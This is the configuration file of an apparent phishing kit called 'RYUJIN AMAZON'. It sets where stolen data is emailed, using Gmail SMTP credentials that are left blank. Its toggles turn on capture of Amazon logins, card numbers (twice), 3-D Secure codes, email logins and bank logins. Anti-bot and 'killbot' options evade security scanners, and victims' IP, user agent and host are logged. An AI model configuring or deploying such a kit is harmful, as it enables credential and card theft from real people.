;;; RYUJIN AMAZON 
;;; UPDATED CONFIG DATE : Mon, 2021-01-18 21:28

email_result = "yourresult@email.com" 
parameter = "ryu" 
default_lang = "en" 
case = "locked" 
blocked_page = "403" 
antibot = "" 
ipstack = "" 
killbot = "" 
send_method = "mail" 
one_time = "1" 
send_login = "1" 
double_card = "1" 
3dsecure = "1" 
pap = "1" 
email_login = "1" 
bank = "1" 
lock_lang = "0" 
ip = "1" 
agent = "1" 
host = "1" 
isp = "0" 
proxy = "0" 
smtp_hostname = "smtp.gmail.com" 
smtp_port = "587" 
smtp_username = "##" 
smtp_password = "##" 
smtp_secure = "TLS" 
